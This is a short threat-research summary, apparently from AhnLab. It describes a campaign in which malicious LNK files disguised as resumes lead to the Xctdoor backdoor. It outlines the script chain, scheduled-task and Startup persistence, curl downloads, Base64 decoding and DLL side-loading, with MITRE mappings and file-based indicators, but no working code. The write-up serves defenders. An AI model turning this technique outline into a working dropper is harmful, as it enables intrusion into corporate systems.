Threat Research

It looks like a normal resume, but the infection begins the moment it is opened.

Ahnlab
It looks like a normal resume, but the infection begins the moment it is opened.
Malicious LNK shortcut files disguised as resume documents are being used to trick corporate users into opening seemingly legitimate files that launch a hidden infection chain. The attack creates scripts, schedules persistence through Task Scheduler and the Startup folder, uses DLL side-loading, and ultimately executes the Xctdoor backdoor while communicating with a C2 server. #Xctdoor #MicrosoftBing #ProximityCommonDLL #office365

Keypoints

  • Threat actors are distributing malicious .LNK files disguised as resume documents with company names and job titles in the filenames.
  • When opened, the LNK file shows a legitimate decoy resume document to reduce suspicion while malicious code runs in the background.
  • The attack creates batch, PowerShell, and VBScript files in C:UsersPublicVideos and uses a script chain to continue execution.
  • A scheduled task named office365 is registered to run a VBScript every 10 minutes, helping the attack persist after reboot or process termination.
  • Additional files are downloaded with curl, decoded, and turned into components including ProximityUxHost.exe, ProximityCommon.DLL, settings.dat, and MicrosoftBing.LNK.
  • The malware uses DLL side-loading to inject the backdoor Xctdoor from settings.dat into a legitimate process and attempts communication with an external C2 server.
  • Defenders are advised to inspect Task Scheduler entries and delete suspicious files under the Microsoft.BingSearch365 package path and the user Startup area.

MITRE Techniques

  • [T1204.002 ] User Execution: Malicious File – The attack depends on users opening a disguised LNK resume file to start the infection chain (‘executing an LNK file disguised as a resume’).
  • [T1036 ] Masquerading – Threat actors name files to look like legitimate resume documents and use a task name that resembles a business service (‘name the files to resemble resume documents’; ‘name “office365”’).
  • [T1053.005 ] Scheduled Task/Job: Scheduled Task – A PowerShell script registers a Task Scheduler job named office365 to run a VBScript every 10 minutes (‘registers a Task Scheduler job named “office365”’).
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – PowerShell scripts are created and executed as part of the malware chain (‘PowerShell scripts (.ps1) … the newly created PowerShell script is subsequently executed’).
  • [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – Batch files (.bat) are created and executed to continue the attack flow (‘batch files (.bat) … are created’; ‘the VBScript file then executes a batch file’).
  • [T1059.005 ] Command and Scripting Interpreter: Visual Basic – VBScript files (.vbs) are used to execute the batch file and maintain the chain (‘VBScript files (.vbs) … the VBScript file then executes a batch file’).
  • [T1105 ] Ingress Tool Transfer – Additional files are downloaded from an external server using curl (‘uses the `curl` command to download additional files from an external server’).
  • [T1027 ] Obfuscated Files or Information – Downloaded files are Base64-encoded and later decoded before use (‘Some of the downloaded files are encoded in Base64’).
  • [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – The malware creates a shortcut in the Startup path to ensure persistence (‘creates a shortcut on the Startup path’).
  • [T1574.002 ] Hijack Execution Flow: DLL Side-Loading – Legitimate executables load malicious DLLs to run the payload (‘DLL side-loading technique was used’; ‘ProximityCommon.dll was loaded’).
  • [T1055 ] Process Injection – The backdoor Xctdoor is injected into a legitimate process after DLL loading (‘the backdoor malware Xctdoor … was injected into the legitimate process’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – The malware attempts to communicate with an external C2 server over network protocols (‘attempted to communicate with a specific external C2 server’).

Indicators of Compromise

  • [File names ] malicious and generated files – (RESUME)_Korea Company Name_Job Title_***.LNK, MicrosoftBing.LNK
  • [File paths ] script and payload locations – C:UsersPublicVideos, C:UsersPublicPicturesp2.ps1
  • [File names ] dropped executable and support files – ProximityUxHost.exe, ProximityCommon.DLL, settings.dat
  • [Scheduled task name ] persistence artifact – office365
  • [User profile path ] suspicious package location – C:Users{User}AppDataLocalPackagesMicrosoft.BingSearch365_8wekyb3d8bbweAppData
  • [External server / C2 ] download and command endpoint context – external download server via curl, specific external C2 server for Xctdoor

Read more: https://asec.ahnlab.com/en/94165/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint